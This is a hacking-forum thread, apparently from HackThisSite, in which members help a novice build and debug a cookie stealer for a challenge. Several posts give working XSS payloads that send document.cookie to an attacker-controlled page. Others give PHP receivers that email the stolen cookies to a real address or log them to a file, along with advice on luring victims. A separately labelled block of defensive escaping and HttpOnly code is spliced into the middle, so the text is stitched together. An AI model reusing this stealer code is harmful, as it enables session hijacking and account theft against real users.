
Making a cookie stealer


thehare (Member)

Ok lately I've been trying to make a cookie stealer as "homework" for my php learning, I thought I had made it, but when I went to try it out on a challenge for HTS (it requires a cookie stealer for the challenge) it did not work:@. Can someone tell if there is a problem with my cookie stealer.

Here is my receiving end:

<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("finder104@yahoo.ca", "Cookie stealer report", $cookie); ?>

And here is my sending end:

<script language="JavaScript"> document.location="http://localhost/projects/cl.php?cookie=" + document.cookie; </script>

My plan was for the stealer to send the cookie to my email address. And just so you know I am new to PHP.

And if you want to help please don't post actual pieces of code as I want to try to make this on my own, if you see something wrong just say what line it is on and tell me the problem.

So if anyone knows what is wrong with it I would be grateful.

Thanks Thehare


ghost

thehare wrote: Ok lately I've been trying to make a cookie stealer as "homework" for my php learning, I thought I had made it, but when I went to try it out on a challenge for HTS (it requires a cookie stealer for the challenge) it did not work:@. Can someone tell if there is a problem with my cookie stealer.

Here is my receiving end:

<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("finder104@yahoo.ca", "Cookie stealer report", $cookie); ?>

And here is my sending end:

<script language="JavaScript"> document.location="http://localhost/projects/cl.php?cookie=" + document.cookie; </script>

My plan was for the stealer to send the cookie to my email address. And just so you know I am new to PHP.

So if anyone knows what is wrong with it I would be grateful.

Thanks Thehare

First off, you can't link to 'localhost', you need to link to your IP address. The address should look like this:

http://98.28.328.4323/projects/cl.php?cookie= etc etc. Secondly, you would need a mail server running on your server in order to be able to have it mailed to you. Those are 2 errors I could pick up on pretty quickly. Also, it's easier to write their cookie info to a text file or HTML file.


thehare (Member)

slpctrl wrote: [quote]thehare wrote: Ok lately I've been trying to make a cookie stealer as "homework" for my php learning, I thought I had made it, but when I went to try it out on a challenge for HTS (it requires a cookie stealer for the challenge) it did not work:@. Can someone tell if there is a problem with my cookie stealer.

Here is my receiving end:

<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("finder104@yahoo.ca", "Cookie stealer report", $cookie); ?>

And here is my sending end:

<script language="JavaScript"> document.location="http://localhost/projects/cl.php?cookie=" + document.cookie; </script>

My plan was for the stealer to send the cookie to my email address. And just so you know I am new to PHP.

So if anyone knows what is wrong with it I would be grateful.

Thanks Thehare

First off, you can't link to 'localhost', you need to link to your IP address. The address should look like this:

http://98.28.328.4323/projects/cl.php?cookie= etc etc. Secondly, you would need a mail server running on your server in order to be able to have it mailed to you. Those are 2 errors I could pick up on pretty quickly. Also, it's easier to write their cookie info to a text file or HTML file.[/quote]

Ok first I put local host as a "filler" I was using my actual IP for the test sorry for that "typo" and anyways thanks for the information on the mail server I will have to try something else.

And the point of me doing this is so I can try to improve my (poor) PHP skills.


spyware (Banned)

Improve first, hack 1337er.


thehare (Member)

spyware wrote: Improve first, hack 1337er.

Improve what???


spyware (Banned)

thehare wrote: Improve what???

Reading skills :angry:, and your poor PHP skills which you've mentioned.


ghost

Your cooking skills as well. Have you ever seen a hungry hacker? A hungry hacker is an angry hacker. TRUTH.


ghost

Word to that, never hack on an empty stomach, it's a recipe for disaster! :ninja:


ghost

I'm pretty sure I know what you're talking about but you don't need a real cookie stealer just the XSS part;)


Futility

SaMTHG wrote: I'm pretty sure I know what you're talking about but you don't need a real cookie stealer just the XSS part;)

What?

Why do people insist on talking when they have no idea what they're talking about?


ghost

I'm just letting him know he doesn't need any PHP it's the exploit that counts


spyware (Banned)

SaMTHG wrote: I'm just letting him know he doesn't need any PHP it's the exploit that counts

You're an idiot.


thehare (Member)

SaMTHG wrote: I'm just letting him know he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use XSS, but the point of trying this is just to improve my PHP skills.


spyware (Banned)

thehare wrote: I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.

You're an idiot too, :D. You don't understand what you're trying to do.


ghost

thehare wrote: [quote]SaMTHG wrote: I'm just letting him know he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.[/quote]

XSS isn't a language, it's an exploit. The exploit is that if HTML isn't filtered, you could use the script tag to inject javascript into the page, and with the javascript you can do LOTS of things, much more than just cookie stealing. Cookie stealing is only very basic XSS. Don't listen to SaMTHG he really doesn't know what he's talking about. Watch this video:

http://keepitlocked.net/archive/2008/06/17/quot-the-spy-who-hacked-me-quot-teched-2008-demo.aspx

Very informative on advanced XSS attack vectors.
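
Added example (not part of the thread or any poster's code): the defensive side of the XSS described in the post above. `escapeHtml` is the output filtering the post says is missing, and `scriptVisibleCookies` models which cookies `document.cookie` exposes once the session cookie is marked HttpOnly; all function names and the Set-Cookie sample values are constructed for illustration.

```javascript
// Added example; function names and sample headers are constructed.

// Encode HTML-significant characters so user input renders as text, not markup.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Parse one Set-Cookie header value into its name, value and security attributes.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((part) => part.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq < 0 ? '' : pair.slice(0, eq),
    value: eq < 0 ? pair : pair.slice(eq + 1),
    httpOnly: false, secure: false, sameSite: null,
  };
  for (const attr of attrs) {
    const [key, val] = attr.split('=');
    const k = key.trim().toLowerCase();
    if (k === 'httponly') cookie.httpOnly = true;
    else if (k === 'secure') cookie.secure = true;
    else if (k === 'samesite') cookie.sameSite = (val || '').trim();
  }
  return cookie;
}

// Model of document.cookie: browsers omit HttpOnly cookies from script access.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders.map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Audit helper: names of sensitive cookies that injected script could still read.
function exposedSensitiveCookies(setCookieHeaders, sensitiveNames) {
  return setCookieHeaders.map(parseSetCookie)
    .filter((c) => sensitiveNames.includes(c.name) && !c.httpOnly)
    .map((c) => c.name);
}

// Constructed sample responses: the same site before and after hardening.
const weakHeaders = ['PHPSESSID=abc123; Path=/', 'theme=dark; Path=/'];
const hardenedHeaders = ['PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax', 'theme=dark; Path=/'];

console.log(escapeHtml('<script>alert(1)</script>'));
console.log(scriptVisibleCookies(weakHeaders), '|', scriptVisibleCookies(hardenedHeaders));
console.log(exposedSensitiveCookies(weakHeaders, ['PHPSESSID']));
```

HttpOnly only keeps the session cookie out of script reach; the injected script still runs unless output is encoded, so both controls are needed.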


thehare (Member)

slpctrl wrote: [quote]thehare wrote: [quote]SaMTHG wrote: I'm just letting him know he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.[/quote]

XSS isn't a language, it's an exploit. The exploit is that if HTML isn't filtered, you could use the script tag to inject javascript into the page, and with the javascript you can do LOTS of things, much more than just cookie stealing. Cookie stealing is only very basic XSS. Don't listen to SaMTHG he really doesn't know what he's talking about. Watch this video:

http://keepitlocked.net/archive/2008/06/17/quot-the-spy-who-hacked-me-quot-teched-2008-demo.aspx

Very informative on advanced XSS attack vectors.[/quote]

Alright I'll look into that, but now I am wondering how hard it is to make a cookie stealer in PHP.


ghost

It's easy. Make the page to get the cookies from a get variable, let's say get variable cookie, then save it to a text file. Afterwards, access the page thru javascript like: location.href="page.php?cookie="+document.cookie

Simple as that!

And no! I did not read the whole thread before. But I agree, you sir are indeed an idiot.


ghost

here

<?php $cookie = $_GET['cookie']; $fp = fopen("cookies.txt", "a"); fwrite($fp, 'Cookie: '.$cookie.); fclose($fp); header ("Location:"); ?>

I know you didn't want this but obviously this is the best you're going to get. Just work on improving it.


ghost

slpctrl wrote: [quote]thehare wrote: [quote]SaMTHG wrote: I'm just letting him know he doesn't need any PHP it's the exploit that counts

I understand that It would be easier to use a language like XSS, but the point of trying this is just to improve my PHP skills.[/quote]

XSS isn't a language, it's an exploit. The exploit is that if HTML isn't filtered, you could use the script tag to inject javascript into the page, and with the javascript you can do LOTS of things, much more than just cookie stealing. Cookie stealing is only very basic XSS. Don't listen to SaMTHG he really doesn't know what he's talking about. Watch this video:

http://keepitlocked.net/archive/2008/06/17/quot-the-spy-who-hacked-me-quot-teched-2008-demo.aspx

Very informative on advanced XSS attack vectors.[/quote]

If I didn't know what I was talking about I wouldn't have been able to complete the HTS chall, would I? Anyway, I'm sorry, I didn't understand at first. I thought you wanted to complete the chall, I didn't know you actually wanted to code a CookieStealer. If you had, I would have tried to help (not too great with the PHP :whoa:)


ghost

If I didn't know what I was talking about I wouldn't have been able to complete the HTS chall would I?

Challenges and points mean absolutely NOTHING. And anyways you probably asked someone for the answer like you have for most of the challenges here.


ghost

Dude, you send the person a link to your cookie stealer with a get request. On the server side, you log the request and write it to a file.

<script>window.location="http://example.com?cookie="+document.cookie</script>

Server side:

<?php $cookie=$_GET['cookie']; fopen(file,method); fwrite(file,$cookie); fclose(file); ?>

This is not obscure in the least, and the code will need to be optimized for efficiency (Hell it's not guaranteed to work since I didn't bother to test it). Also, I'm not any sort of expert in XSS and the like at all. Check out http://xssed.com


ghost

SaMTHG wrote: I'm just letting him know he doesn't need any PHP it's the exploit that counts

That makes just about as much sense as milkshakes without the milk or mixdranks without slpctrl B) It just doesn't work like that. They have to coexist to amount to anything.


ghost

Pwnzall wrote: [quote]SaMTHG wrote: I'm just letting him know he doesn't need any PHP it's the exploit that counts or mixdranks without slpctrl B)[/quote]

B)


ghost

If you just wanted a cookie logger then there are some excellent ones in our code bank here. But as it seems like you have no clue what it's all about whatsoever, I suggest you learn some javascript first. Maybe then you'll understand that javascript is client side, i.e. you! PHP is server side, i.e. the server where the site is hosted.